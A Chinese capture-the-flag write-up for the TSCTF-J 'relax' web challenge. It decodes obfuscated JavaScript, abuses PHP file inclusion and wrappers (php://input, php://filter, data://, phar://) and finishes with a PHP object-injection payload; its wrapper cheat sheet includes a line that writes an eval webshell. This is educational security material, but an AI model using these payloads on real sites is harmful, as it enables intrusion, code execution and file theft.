首页 > 其他 > 详细

[TSCTF-J] relax

时间:2020-05-10 19:25:08      阅读:74      评论:0      收藏:0      [点我收藏+]

[TSCTF-J] relax

1.源码审计

利用扫描器可以扫到robots.txt

进入发现三个文件

flag.php heicore.php relax.php

我们只能进入relax.php

发现下面的奇怪字符,可以放到控制台里执行康康

?ω??= /`m′)? ~┻━┻   //*′?`*/ [‘_‘]; o=(???)  =_=3; c=(?Θ?) =(???)-(???); (?Д?) =(?Θ?)= (o^_^o)/ (o^_^o);(?Д?)={?Θ?: ‘_‘ ,?ω?? : ((?ω??==3) +‘_‘) [?Θ?] ,???? :(?ω??+ ‘_‘)[o^_^o -(?Θ?)] ,?Д??:((???==3) +‘_‘)[???] }; (?Д?) [?Θ?] =((?ω??==3) +‘_‘) [c^_^o];(?Д?) [‘c‘] = ((?Д?)+‘_‘) [ (???)+(???)-(?Θ?) ];(?Д?) [‘o‘] = ((?Д?)+‘_‘) [?Θ?];(?o?)=(?Д?) [‘c‘]+(?Д?) [‘o‘]+(?ω?? +‘_‘)[?Θ?]+ ((?ω??==3) +‘_‘) [???] + ((?Д?) +‘_‘) [(???)+(???)]+ ((???==3) +‘_‘) [?Θ?]+((???==3) +‘_‘) [(???) - (?Θ?)]+(?Д?) [‘c‘]+((?Д?)+‘_‘) [(???)+(???)]+ (?Д?) [‘o‘]+((???==3) +‘_‘) [?Θ?];(?Д?) [‘_‘] =(o^_^o) [?o?] [?o?];(?ε?)=((???==3) +‘_‘) [?Θ?]+ (?Д?) .?Д??+((?Д?)+‘_‘) [(???) + (???)]+((???==3) +‘_‘) [o^_^o -?Θ?]+((???==3) +‘_‘) [?Θ?]+ (?ω?? +‘_‘) [?Θ?]; (???)+=(?Θ?); (?Д?)[?ε?]=‘\\‘; (?Д?).?Θ??=(?Д?+ ???)[o^_^o -(?Θ?)];(o???o)=(?ω?? +‘_‘)[c^_^o];(?Д?) [?o?]=‘\"‘;(?Д?) [‘_‘] ( (?Д?) [‘_‘] (?ε?+(?Д?)[?o?]+ (?Д?)[?ε?]+(?Θ?)+ (???)+ (?Θ?)+ (?Д?)[?ε?]+(?Θ?)+ ((???) + (?Θ?))+ (???)+ (?Д?)[?ε?]+(?Θ?)+ (???)+ ((???) + (?Θ?))+ (?Д?)[?ε?]+(?Θ?)+ ((o^_^o) +(o^_^o))+ ((o^_^o) - (?Θ?))+ (?Д?)[?ε?]+(?Θ?)+ ((o^_^o) +(o^_^o))+ (???)+ (?Д?)[?ε?]+((???) + (?Θ?))+ (c^_^o)+ (?Д?)[?ε?]+(???)+ ((o^_^o) - (?Θ?))+ (?Д?)[?ε?]+(???)+ (???)+ (?Д?)[?ε?]+(?Θ?)+ (o^_^o)+ ((???) + (o^_^o))+ (?Д?)[?ε?]+(???)+ (c^_^o)+ (?Д?)[?ε?]+((???) + (o^_^o))+ ((???) + (?Θ?))+ (?Д?)[?ε?]+(???)+ (c^_^o)+ (?Д?)[?ε?]+(???)+ (???)+ (?Д?)[?ε?]+(?Θ?)+ (o^_^o)+ ((???) + (o^_^o))+ (?Д?)[?ε?]+(?Θ?)+ (c^_^o)+ ((???) + (o^_^o))+ (?Д?)[?ε?]+(?Θ?)+ (c^_^o)+ ((???) + (?Θ?))+ (?Д?)[?ε?]+(?Θ?)+ ((o^_^o) - (?Θ?))+ (???)+ (?Д?)[?ε?]+(?Θ?)+ (o^_^o)+ (o^_^o)+ (?Д?)[?ε?]+(???)+ ((???) + (o^_^o))+ (?Д?)[?ε?]+(?Θ?)+ ((o^_^o) +(o^_^o))+ (c^_^o)+ (?Д?)[?ε?]+(?Θ?)+ ((o^_^o) +(o^_^o))+ ((???) + (o^_^o))+ (?Д?)[?ε?]+(???)+ ((???) + (o^_^o))+ (?Д?)[?ε?]+(?Θ?)+ (o^_^o)+ ((???) + (?Θ?))+ (?Д?)[?ε?]+((???) + (o^_^o))+ (o^_^o)+ (?Д?)[?ε?]+(???)+ (???)+ (?Д?)[?ε?]+(?Θ?)+ (o^_^o)+ ((???) + (o^_^o))+ (?Д?)[?ε?]+(?Θ?)+ (o^_^o)+ ((???) + (o^_^o))+ (?Д?)[?ε?]+(???)+ (c^_^o)+ (?Д?)[?ε?]+((???) + (o^_^o))+ ((???) + (?Θ?))+ (?Д?)[?ε?]+(???)+ (c^_^o)+ (?Д?)[?ε?]+(???)+ (???)+ (?Д?)[?ε?]+(?Θ?)+ (o^_^o)+ ((???) + (o^_^o))+ (?Д?)[?ε?]+(?Θ?)+ (c^_^o)+ ((???) + (o^_^o))+ (?Д?)[?ε?]+(?Θ?)+ (c^_^o)+ ((???) + (?Θ?))+ (?Д?)[?ε?]+(?Θ?)+ ((o^_^o) - (?Θ?))+ (???)+ (?Д?)[?ε?]+(?Θ?)+ (o^_^o)+ (o^_^o)+ (?Д?)[?ε?]+(???)+ ((???) + (o^_^o))+ (?Д?)[?ε?]+(?Θ?)+ (???)+ ((o^_^o) +(o^_^o))+ (?Д?)[?ε?]+(?Θ?)+ ((???) + (?Θ?))+ (?Θ?)+ (?Д?)[?ε?]+(?Θ?)+ ((???) + (?Θ?))+ (???)+ (?Д?)[?ε?]+(?Θ?)+ (???)+ ((???) + (?Θ?))+ (?Д?)[?ε?]+(???)+ ((???) + (o^_^o))+ (?Д?)[?ε?]+(?Θ?)+ (o^_^o)+ ((???) + (?Θ?))+ (?Д?)[?ε?]+((???) + (o^_^o))+ (o^_^o)+ (?Д?)[?ε?]+(???)+ (???)+ (?Д?)[?ε?]+(?Θ?)+ (o^_^o)+ ((???) + (o^_^o))+ (?Д?)[?ε?]+(?Θ?)+ (o^_^o)+ ((???) + (o^_^o))+ (?Д?)[?ε?]+(?Θ?)+ (o^_^o)+ ((???) + (o^_^o))+ (?Д?)[?ε?]+(???)+ (c^_^o)+ (?Д?)[?ε?]+((???) + (o^_^o))+ ((???) + (?Θ?))+ (?Д?)[?ε?]+(???)+ (c^_^o)+ (?Д?)[?ε?]+(???)+ (???)+ (?Д?)[?ε?]+(?Θ?)+ (o^_^o)+ ((???) + (o^_^o))+ (?Д?)[?ε?]+(?Θ?)+ (c^_^o)+ ((???) + (o^_^o))+ (?Д?)[?ε?]+(?Θ?)+ (c^_^o)+ ((???) + (?Θ?))+ (?Д?)[?ε?]+(?Θ?)+ ((o^_^o) - (?Θ?))+ (???)+ (?Д?)[?ε?]+(?Θ?)+ (o^_^o)+ (o^_^o)+ (?Д?)[?ε?]+(???)+ ((???) + (o^_^o))+ (?Д?)[?ε?]+((???) + (?Θ?))+ (c^_^o)+ (?Д?)[?ε?]+((???) + (o^_^o))+ ((o^_^o) +(o^_^o))+ (?Д?)[?ε?]+((???) + (o^_^o))+ (???)+ (?Д?)[?ε?]+((???) + (?Θ?))+ (?Θ?)+ (?Д?)[?ε?]+(???)+ ((???) + (o^_^o))+ (?Д?)[?ε?]+(?Θ?)+ (o^_^o)+ ((???) + (?Θ?))+ (?Д?)[?ε?]+((???) + (o^_^o))+ (o^_^o)+ (?Д?)[?ε?]+(?Θ?)+ ((???) + (?Θ?))+ (?Θ?)+ (?Д?)[?ε?]+(?Θ?)+ (???)+ ((o^_^o) +(o^_^o))+ (?Д?)[?ε?]+((???) + (?Θ?))+ (c^_^o)+ (?Д?)[?ε?]+(?Θ?)+ ((???) + (?Θ?))+ (?Θ?)+ (?Д?)[?ε?]+(?Θ?)+ ((o^_^o) +(o^_^o))+ (o^_^o)+ (?Д?)[?ε?]+(?Θ?)+ ((o^_^o) +(o^_^o))+ (o^_^o)+ (?Д?)[?ε?]+(?Θ?)+ (???)+ ((???) + (?Θ?))+ (?Д?)[?ε?]+(?Θ?)+ ((o^_^o) +(o^_^o))+ (???)+ (?Д?)[?ε?]+((???) + (?Θ?))+ (c^_^o)+ (?Д?)[?ε?]+(???)+ (???)+ (?Д?)[?ε?]+(?Θ?)+ (o^_^o)+ ((???) + (o^_^o))+ (?Д?)[?ε?]+((???) + (?Θ?))+ (?Θ?)+ (?Д?)[?ε?]+(???)+ ((o^_^o) +(o^_^o))+ (?Д?)[?ε?]+(???)+ ((o^_^o) +(o^_^o))+ (?Д?)[?ε?]+((???) + (?Θ?))+ (c^_^o)+ (?Д?)[?ε?]+(?Θ?)+ (???)+ ((o^_^o) +(o^_^o))+ (?Д?)[?ε?]+(?Θ?)+ ((???) + (?Θ?))+ (?Θ?)+ (?Д?)[?ε?]+(?Θ?)+ ((???) + (?Θ?))+ (???)+ (?Д?)[?ε?]+(?Θ?)+ (???)+ ((???) + (?Θ?))+ (?Д?)[?ε?]+(?Θ?)+ (o^_^o)+ ((???) + (o^_^o))+ (?Д?)[?ε?]+(?Θ?)+ (???)+ ((???) + (o^_^o))+ (?Д?)[?ε?]+(?Θ?)+ (???)+ ((???) + (?Θ?))+ (?Д?)[?ε?]+(?Θ?)+ ((o^_^o) +(o^_^o))+ (???)+ (?Д?)[?ε?]+(?Θ?)+ (o^_^o)+ ((???) + (o^_^o))+ (?Д?)[?ε?]+(?Θ?)+ (???)+ (o^_^o)+ (?Д?)[?ε?]+(?Θ?)+ ((???) + (?Θ?))+ ((???) + (o^_^o))+ (?Д?)[?ε?]+(?Θ?)+ ((???) + (?Θ?))+ ((o^_^o) +(o^_^o))+ (?Д?)[?ε?]+(?Θ?)+ ((o^_^o) +(o^_^o))+ (???)+ (?Д?)[?ε?]+(?Θ?)+ (???)+ ((???) + (?Θ?))+ (?Д?)[?ε?]+(?Θ?)+ ((???) + (?Θ?))+ ((o^_^o) +(o^_^o))+ (?Д?)[?ε?]+(?Θ?)+ ((o^_^o) +(o^_^o))+ (???)+ (?Д?)[?ε?]+(?Θ?)+ ((o^_^o) +(o^_^o))+ (o^_^o)+ (?Д?)[?ε?]+((???) + (?Θ?))+ (c^_^o)+ (?Д?)[?ε?]+(???)+ (???)+ (?Д?)[?ε?]+(?Θ?)+ (o^_^o)+ ((???) + (o^_^o))+ (?Д?)[?ε?]+((???) + (?Θ?))+ (???)+ (?Д?)[?ε?]+(???)+ ((???) + (o^_^o))+ (?Д?)[?ε?]+(?Θ?)+ ((o^_^o) +(o^_^o))+ ((o^_^o) - (?Θ?))+ (?Д?)[?ε?]+(???)+ ((???) + (o^_^o))+ (?Д?)[?ε?]+((???) + (?Θ?))+ (?Θ?)+ (?Д?)[?ε?]+((???) + (o^_^o))+ ((???) + (?Θ?))+ (?Д?)[?ε?]+((???) + (o^_^o))+ ((???) + (?Θ?))+ (?Д?)[?ε?]+((???) + (o^_^o))+ ((???) + (?Θ?))+ (?Д?)[?ε?]+(?Θ?)+ (o^_^o)+ (???)+ (?Д?)[?ε?]+(???)+ ((o^_^o) - (?Θ?))+ (?Д?)[?ε?]+(?Θ?)+ ((o^_^o) - (?Θ?))+ (???)+ (?Д?)[?ε?]+(?Θ?)+ ((o^_^o) +(o^_^o))+ ((???) + (o^_^o))+ (?Д?)[?ε?]+(?Θ?)+ ((???) + (?Θ?))+ ((???) + (o^_^o))+ (?Д?)[?ε?]+(???)+ (c^_^o)+ (?Д?)[?ε?]+(?Θ?)+ ((o^_^o) +(o^_^o))+ (???)+ (?Д?)[?ε?]+(?Θ?)+ ((???) + (?Θ?))+ (c^_^o)+ (?Д?)[?ε?]+(?Θ?)+ ((???) + (?Θ?))+ ((???) + (o^_^o))+ (?Д?)[?ε?]+(?Θ?)+ ((o^_^o) +(o^_^o))+ ((???) + (?Θ?))+ (?Д?)[?ε?]+(?Θ?)+ ((o^_^o) +(o^_^o))+ (o^_^o)+ (?Д?)[?ε?]+(?Θ?)+ (???)+ (?Θ?)+ (?Д?)[?ε?]+(?Θ?)+ ((???) + (?Θ?))+ ((o^_^o) +(o^_^o))+ (?Д?)[?ε?]+(?Θ?)+ (???)+ (???)+ (?Д?)[?ε?]+(???)+ (c^_^o)+ (?Д?)[?ε?]+(?Θ?)+ ((o^_^o) +(o^_^o))+ (???)+ (?Д?)[?ε?]+(?Θ?)+ ((???) + (?Θ?))+ (c^_^o)+ (?Д?)[?ε?]+(?Θ?)+ ((o^_^o) +(o^_^o))+ ((o^_^o) - (?Θ?))+ (?Д?)[?ε?]+(?Θ?)+ (???)+ ((???) + (?Θ?))+ (?Д?)[?ε?]+(?Θ?)+ (???)+ ((???) + (?Θ?))+ (?Д?)[?ε?]+(???)+ (c^_^o)+ (?Д?)[?ε?]+(?Θ?)+ ((???) + (?Θ?))+ (c^_^o)+ (?Д?)[?ε?]+(?Θ?)+ ((o^_^o) +(o^_^o))+ ((???) + (?Θ?))+ (?Д?)[?ε?]+(?Θ?)+ ((???) + (?Θ?))+ ((o^_^o) +(o^_^o))+ (?Д?)[?ε?]+(?Θ?)+ (???)+ (???)+ (?Д?)[?ε?]+(?Θ?)+ ((o^_^o) +(o^_^o))+ ((o^_^o) - (?Θ?))+ (?Д?)[?ε?]+(?Θ?)+ (???)+ ((???) + (?Θ?))+ (?Д?)[?ε?]+(?Θ?)+ (???)+ (???)+ (?Д?)[?ε?]+(???)+ (c^_^o)+ (?Д?)[?ε?]+(?Θ?)+ (???)+ (?Θ?)+ (?Д?)[?ε?]+(?Θ?)+ ((???) + (?Θ?))+ ((o^_^o) +(o^_^o))+ (?Д?)[?ε?]+(?Θ?)+ (???)+ (???)+ (?Д?)[?ε?]+(???)+ (c^_^o)+ (?Д?)[?ε?]+(?Θ?)+ ((o^_^o) +(o^_^o))+ (???)+ (?Д?)[?ε?]+(?Θ?)+ ((???) + (?Θ?))+ (c^_^o)+ (?Д?)[?ε?]+(?Θ?)+ ((???) + (?Θ?))+ (?Θ?)+ (?Д?)[?ε?]+(?Θ?)+ ((o^_^o) +(o^_^o))+ ((o^_^o) - (?Θ?))+ (?Д?)[?ε?]+(?Θ?)+ ((o^_^o) +(o^_^o))+ (???)+ (?Д?)[?ε?]+(?Θ?)+ ((???) + (o^_^o))+ (?Θ?)+ (?Д?)[?ε?]+((???) + (?Θ?))+ ((???) + (?Θ?))+ (?Д?)[?ε?]+(?Θ?)+ ((o^_^o) +(o^_^o))+ (???)+ (?Д?)[?ε?]+(?Θ?)+ ((???) + (?Θ?))+ (c^_^o)+ (?Д?)[?ε?]+(?Θ?)+ ((o^_^o) +(o^_^o))+ ((o^_^o) - (?Θ?))+ (?Д?)[?ε?]+(?Θ?)+ (???)+ ((???) + (?Θ?))+ (?Д?)[?ε?]+(?Θ?)+ (???)+ ((???) + (?Θ?))+ (?Д?)[?ε?]+(?Θ?)+ (o^_^o)+ (???)+ (?Д?)[?ε?]+(???)+ ((o^_^o) - (?Θ?))+ (?Д?)[?ε?]+((???) + (?Θ?))+ (?Θ?)+ (?Д?)[?ε?]+((???) + (?Θ?))+ (?Θ?)+ (?Д?)[?ε?]+(?Θ?)+ ((???) + (o^_^o))+ (o^_^o)+ (?Д?)[?ε?]+(?Θ?)+ (???)+ ((???) + (?Θ?))+ (?Д?)[?ε?]+(?Θ?)+ (???)+ (o^_^o)+ (?Д?)[?ε?]+(?Θ?)+ ((???) + (?Θ?))+ (c^_^o)+ (?Д?)[?ε?]+(?Θ?)+ ((???) + (?Θ?))+ ((???) + (o^_^o))+ (?Д?)[?ε?]+(???)+ (c^_^o)+ (?Д?)[?ε?]+(???)+ ((???) + (o^_^o))+ (?Д?)[?ε?]+((???) + (o^_^o))+ (???)+ (?Д?)[?ε?]+(?Θ?)+ ((???) + (?Θ?))+ (?Θ?)+ (?Д?)[?ε?]+(?Θ?)+ ((???) + (?Θ?))+ ((???) + (?Θ?))+ (?Д?)[?ε?]+(?Θ?)+ (???)+ ((???) + (o^_^o))+ (?Д?)[?ε?]+(???)+ (c^_^o)+ (?Д?)[?ε?]+(?Θ?)+ ((o^_^o) +(o^_^o))+ (o^_^o)+ (?Д?)[?ε?]+(?Θ?)+ ((o^_^o) +(o^_^o))+ ((o^_^o) - (?Θ?))+ (?Д?)[?ε?]+(?Θ?)+ (???)+ (o^_^o)+ (?Д?)[?ε?]+((???) + (o^_^o))+ ((???) + (?Θ?))+ (?Д?)[?ε?]+(?Θ?)+ (o^_^o)+ (???)+ (?Д?)[?ε?]+(???)+ ((o^_^o) - (?Θ?))+ (?Д?)[?ε?]+((???) + (?Θ?))+ ((o^_^o) +(o^_^o))+ (?Д?)[?ε?]+((???) + (?Θ?))+ ((???) + (o^_^o))+ (?Д?)[?ε?]+(?Θ?)+ ((???) + (?Θ?))+ (?Θ?)+ (?Д?)[?ε?]+(?Θ?)+ ((???) + (?Θ?))+ ((???) + (?Θ?))+ (?Д?)[?ε?]+(?Θ?)+ (???)+ (?Θ?)+ (?Д?)[?ε?]+(?Θ?)+ (???)+ ((???) + (o^_^o))+ (?Д?)[?ε?]+(?Θ?)+ (???)+ ((???) + (?Θ?))+ (?Д?)[?ε?]+(?Θ?)+ ((o^_^o) +(o^_^o))+ (o^_^o)+ (?Д?)[?ε?]+((???) + (?Θ?))+ ((???) + (o^_^o))+ (?Д?)[?ε?]+((o^_^o) +(o^_^o))+ (?Θ?)+ (?Д?)[?ε?]+((o^_^o) +(o^_^o))+ (o^_^o)+ (?Д?)[?ε?]+((???) + (?Θ?))+ ((o^_^o) +(o^_^o))+ (?Д?)[?ε?]+(?Θ?)+ ((???) + (?Θ?))+ ((o^_^o) - (?Θ?))+ (?Д?)[?ε?]+(?Θ?)+ ((o^_^o) +(o^_^o))+ (c^_^o)+ (?Д?)[?ε?]+(?Θ?)+ (???)+ ((???) + (o^_^o))+ (?Д?)[?ε?]+(?Θ?)+ (o^_^o)+ (???)+ (?Д?)[?ε?]+(???)+ ((o^_^o) - (?Θ?))+ (?Д?)[?ε?]+(???)+ (c^_^o)+ (?Д?)[?ε?]+(?Θ?)+ (???)+ (?Θ?)+ (?Д?)[?ε?]+(?Θ?)+ ((???) + (?Θ?))+ (???)+ (?Д?)[?ε?]+(?Θ?)+ ((o^_^o) +(o^_^o))+ (???)+ (?Д?)[?ε?]+((???) + (o^_^o))+ ((???) + (?Θ?))+ (?Д?)[?ε?]+(?Θ?)+ (o^_^o)+ (???)+ (?Д?)[?ε?]+(???)+ ((o^_^o) - (?Θ?))+ (?Д?)[?ε?]+(?Θ?)+ (o^_^o)+ (???)+ (?Д?)[?ε?]+(???)+ ((o^_^o) - (?Θ?))+ (?Д?)[?ε?]+((???) + (o^_^o))+ ((o^_^o) +(o^_^o))+ (?Д?)[?ε?]+((???) + (o^_^o))+ (???)+ (?Д?)[?ε?]+(?Θ?)+ (???)+ ((o^_^o) - (?Θ?))+ (?Д?)[?ε?]+(?Θ?)+ ((o^_^o) +(o^_^o))+ ((o^_^o) - (?Θ?))+ (?Д?)[?ε?]+((???) + (o^_^o))+ ((o^_^o) +(o^_^o))+ (?Д?)[?ε?]+(???)+ ((???) + (o^_^o))+ (?Д?)[?ε?]+((???) + (o^_^o))+ (o^_^o)+ (?Д?)[?ε?]+(?Θ?)+ ((???) + (?Θ?))+ (?Θ?)+ (?Д?)[?ε?]+(?Θ?)+ ((???) + (?Θ?))+ ((o^_^o) +(o^_^o))+ (?Д?)[?ε?]+(?Θ?)+ (???)+ (o^_^o)+ (?Д?)[?ε?]+(?Θ?)+ ((???) + (?Θ?))+ (???)+ (?Д?)[?ε?]+(?Θ?)+ ((o^_^o) +(o^_^o))+ ((???) + (?Θ?))+ (?Д?)[?ε?]+(?Θ?)+ (???)+ (???)+ (?Д?)[?ε?]+(?Θ?)+ (???)+ ((???) + (?Θ?))+ (?Д?)[?ε?]+((???) + (?Θ?))+ (c^_^o)+ (?Д?)[?ε?]+(???)+ (???)+ (?Д?)[?ε?]+(?Θ?)+ (o^_^o)+ ((???) + (o^_^o))+ (?Д?)[?ε?]+(?Θ?)+ (o^_^o)+ ((???) + (o^_^o))+ (?Д?)[?ε?]+((???) + (?Θ?))+ (?Θ?)+ (?Д?)[?ε?]+((???) + (o^_^o))+ (o^_^o)+ (?Д?)[?ε?]+(?Θ?)+ ((???) + (o^_^o))+ ((???) + (?Θ?))+ (?Д?)[?ε?]+(?Θ?)+ (???)+ ((???) + (?Θ?))+ (?Д?)[?ε?]+(?Θ?)+ ((???) + (?Θ?))+ (???)+ (?Д?)[?ε?]+(?Θ?)+ ((o^_^o) +(o^_^o))+ (o^_^o)+ (?Д?)[?ε?]+(?Θ?)+ (???)+ ((???) + (?Θ?))+ (?Д?)[?ε?]+(?Θ?)+ ((???) + (o^_^o))+ (o^_^o)+ (?Д?)[?ε?]+(?Θ?)+ (???)+ ((???) + (?Θ?))+ (?Д?)[?ε?]+(?Θ?)+ (???)+ (o^_^o)+ (?Д?)[?ε?]+(?Θ?)+ ((???) + (?Θ?))+ (c^_^o)+ (?Д?)[?ε?]+(?Θ?)+ ((???) + (?Θ?))+ ((???) + (o^_^o))+ (?Д?)[?ε?]+(???)+ (c^_^o)+ (?Д?)[?ε?]+(???)+ ((???) + (o^_^o))+ (?Д?)[?ε?]+((???) + (o^_^o))+ (???)+ (?Д?)[?ε?]+(?Θ?)+ ((???) + (?Θ?))+ (?Θ?)+ (?Д?)[?ε?]+(?Θ?)+ ((???) + (?Θ?))+ ((???) + (?Θ?))+ (?Д?)[?ε?]+(?Θ?)+ (???)+ ((???) + (o^_^o))+ (?Д?)[?ε?]+(???)+ (c^_^o)+ (?Д?)[?ε?]+(?Θ?)+ ((o^_^o) +(o^_^o))+ (o^_^o)+ (?Д?)[?ε?]+(?Θ?)+ ((o^_^o) +(o^_^o))+ ((o^_^o) - (?Θ?))+ (?Д?)[?ε?]+(?Θ?)+ (???)+ (o^_^o)+ (?Д?)[?ε?]+((???) + (o^_^o))+ ((???) + (?Θ?))+ (?Д?)[?ε?]+(?Θ?)+ (o^_^o)+ (???)+ (?Д?)[?ε?]+(???)+ ((o^_^o) - (?Θ?))+ (?Д?)[?ε?]+((???) + (?Θ?))+ ((o^_^o) +(o^_^o))+ (?Д?)[?ε?]+((???) + (?Θ?))+ ((???) + (o^_^o))+ (?Д?)[?ε?]+(?Θ?)+ ((???) + (?Θ?))+ (?Θ?)+ (?Д?)[?ε?]+(?Θ?)+ ((???) + (?Θ?))+ ((???) + (?Θ?))+ (?Д?)[?ε?]+(?Θ?)+ (???)+ (?Θ?)+ (?Д?)[?ε?]+(?Θ?)+ (???)+ ((???) + (o^_^o))+ (?Д?)[?ε?]+(?Θ?)+ (???)+ ((???) + (?Θ?))+ (?Д?)[?ε?]+(?Θ?)+ ((o^_^o) +(o^_^o))+ (o^_^o)+ (?Д?)[?ε?]+((???) + (?Θ?))+ ((???) + (o^_^o))+ (?Д?)[?ε?]+((o^_^o) +(o^_^o))+ (?Θ?)+ (?Д?)[?ε?]+((???) + (?Θ?))+ ((o^_^o) +(o^_^o))+ (?Д?)[?ε?]+(?Θ?)+ (???)+ ((???) + (o^_^o))+ (?Д?)[?ε?]+(?Θ?)+ ((???) + (?Θ?))+ (?Θ?)+ (?Д?)[?ε?]+(?Θ?)+ (???)+ ((o^_^o) +(o^_^o))+ (?Д?)[?ε?]+(?Θ?)+ (o^_^o)+ (???)+ (?Д?)[?ε?]+(???)+ ((o^_^o) - (?Θ?))+ (?Д?)[?ε?]+(???)+ (c^_^o)+ (?Д?)[?ε?]+(?Θ?)+ (???)+ (?Θ?)+ (?Д?)[?ε?]+(?Θ?)+ ((???) + (?Θ?))+ (???)+ (?Д?)[?ε?]+(?Θ?)+ ((o^_^o) +(o^_^o))+ (???)+ (?Д?)[?ε?]+((???) + (o^_^o))+ ((???) + (?Θ?))+ (?Д?)[?ε?]+(?Θ?)+ (o^_^o)+ (???)+ (?Д?)[?ε?]+(???)+ ((o^_^o) - (?Θ?))+ (?Д?)[?ε?]+(?Θ?)+ (o^_^o)+ (???)+ (?Д?)[?ε?]+(???)+ ((o^_^o) - (?Θ?))+ (?Д?)[?ε?]+((???) + (o^_^o))+ ((o^_^o) +(o^_^o))+ (?Д?)[?ε?]+(???)+ ((???) + (o^_^o))+ (?Д?)[?ε?]+((???) + (o^_^o))+ (o^_^o)+ (?Д?)[?ε?]+(?Θ?)+ ((???) + (o^_^o))+ ((???) + (?Θ?))+ (?Д?)[?ε?]+(???)+ ((o^_^o) - (?Θ?))+ (?Д?)[?ε?]+((???) + (?Θ?))+ (?Θ?)+ (?Д?)[?ε?]+((???) + (o^_^o))+ (o^_^o)+ (?Д?)[?o?]) (?Θ?)) (‘_‘);

结果

$_ = $_GET[‘pw‘];
$__ = $_GET[‘file‘];
$___ = $_GET[‘(><)‘];
if (isset($_) && (file_get_contents($_, ‘r‘) === "Two thousand three hundred and thirty-three")) {
    echo ‘<img src="./images/13.jpg" alt=""><br>‘;
    include($__);
} else {
    echo ‘<img src="./images/1.gif" alt="">‘;
}

其中 file_get_contents($_, ‘r‘) === "Two thousand three hundred and thirty-three"可以通过伪协议php://input

绕过,即

技术分享图片

然后想着利用include读取flag.php

却没有回显,考虑过滤,采用伪协议的方式先读取其他文件

2.伪协议利用

**读取文件的伪协议 **

  • php://filter

用于读取源码 (无条件限制

?page=php://filter/read=convert.base64-encode/resource=../flag.php
  • file://

用于访问本地文件系统,不受allow_url_fopen与allow_url_include的影响

?path=file:///var/www/html/flag.txt必须是绝对路径

执行php的伪协议

  • php://input 接收post数据

    使用条件

    使用条件:allow_url_fopen:off/on allow_url_include:on

只有 Coentent-Type 为 application/x-www-data-urlencoded 和 multipart/form-data 情况下,PHP 才会将 http 请求数据包中相应的数据填入全局变量 $_POST。

只有 Coentent-Type 为 multipart/form-data 的时候,PHP 不会将 http 请求数据包中的相应数据填入 php: //input,否则其它情况都会。

可以访问请求的原始数据的只读流, 将post请求中的数据作为PHP代码执行

可以用来生成一句话

?xxx=php://input
post传参
<?PHP fputs(fopen(‘shell.php‘,‘w‘),‘<?php @eval($_POST[pass])?>‘);?>
#在php5.2.17 下测试成功,其他均出现报错,原因未知。
  • data://协议

利用data:// 伪协议可以直接达到执行php代码的效果,例如执行phpinfo()函数:

?page=data://text/plain,<?php phpinfo();?>

如果此处对特殊字符进行了过滤,我们还可以通过base64编码后再输入:

?page=data://text/plain;base64,PD9waHAgcGhwaW5mbygpPz4=
  • zip://, bzip2://, zlib://协议 -

zip://, bzip2://, zlib:// 均属于压缩流,可以访问压缩文件中的子文件,不需要指定后缀名

如果网站允许我们上传压缩文件,我们也可以将php文件压缩后进行上传,再通过zip://协议执行。

上传zip后,可以通过绝对或相对路径访问达到执行php的目的

  • phar协议

这个参数是就是php解压缩包的一个函数,不管后缀是什么,都会当做压缩包来解压。

用法:?file=phar://压缩包/内部文件

phar://xxx.png/shell.php 注意: PHP > =5.3.0 压缩包需要是zip协议压缩,rar不行,将木马文件压缩后,改为其他任意格式的文件都可以正常使用。 步骤: 写一个一句话木马文件shell.php,然后用zip协议压缩为shell.zip,然后将后缀改为png等其他格式。

  • 其他

page=dict://127.0.0.1:80 #探测端口开放

page=gopher://127.0.0.1:6379/payload #对redis服务进行getshell等操作

3.解题

在这里我们使用试图读取flag

?file=php://filter/read=convert.base64-encode/resource=flag.php&pw=php://input

失败,可能是过滤掉了

?file=php://filter/read=convert.base64-encode/resource=heicore.php&pw=php://input

得到

<?php

class Heicore{
    public $file;

    public function __destruct(){
        if(isset($this->file)){
            echo file_get_contents($this->file);
        }
    }
}
?>

考虑反序列化

继续读取

?file=php://filter/read=convert.base64-encode/resource=relax.php&pw=php://input

得到

<?php
error_reporting(E_ALL^E_NOTICE^E_WARNING);
$_ = $_GET[‘pw‘];
$__ = $_GET[‘file‘];
$___ = $_GET[‘(><)‘];

if(isset($_)&&(file_get_contents($_,‘r‘)==="Two thousand three hundred and thirty-three")){
    echo ‘<img src="./images/13.jpg" alt=""><br>‘;
    if(preg_match("/flag/i",$__)){
        echo "It‘s not that simple";
        exit();
    }else{
        include($__);
        unserialize($___);
    }
}else{
    echo ‘<img src="./images/1.gif" alt="">‘;
}

?>

构造payload

/relax.php?pw=php://input&file=heicore.php&(><)=O:7:"Heicore":1:{s:4:"file";s:8:"flag.php";}

post传参

Two thousand three hundred and thirty-three

得到flag

参考博客

https://www.cnblogs.com/-mo-/p/11736445.html

https://www.cnblogs.com/fpcing/p/11390179.html

https://www.sohu.com/a/251919841_99907709

[TSCTF-J] relax

原文:https://www.cnblogs.com/LLeaves/p/12864096.html
(0)
(0)
   
举报
评论 一句话评论(0
分享档案
更多>
2021年09月23日 (328)
2021年09月24日 (313)
2021年09月17日 (191)
2021年09月15日 (369)
2021年09月16日 (411)
2021年09月13日 (439)
2021年09月11日 (398)
2021年09月12日 (393)
2021年09月10日 (160)
2021年09月08日 (222)
最新文章
更多>
教程昨日排行
更多>
友情链接
汇智网   PHP教程   插件网  
关于我们 - 联系我们 - 留言反馈 - 联系我们:wmxa8@hotmail.com
© 2014 bubuko.com 版权所有
打开技术之扣,分享程序人生!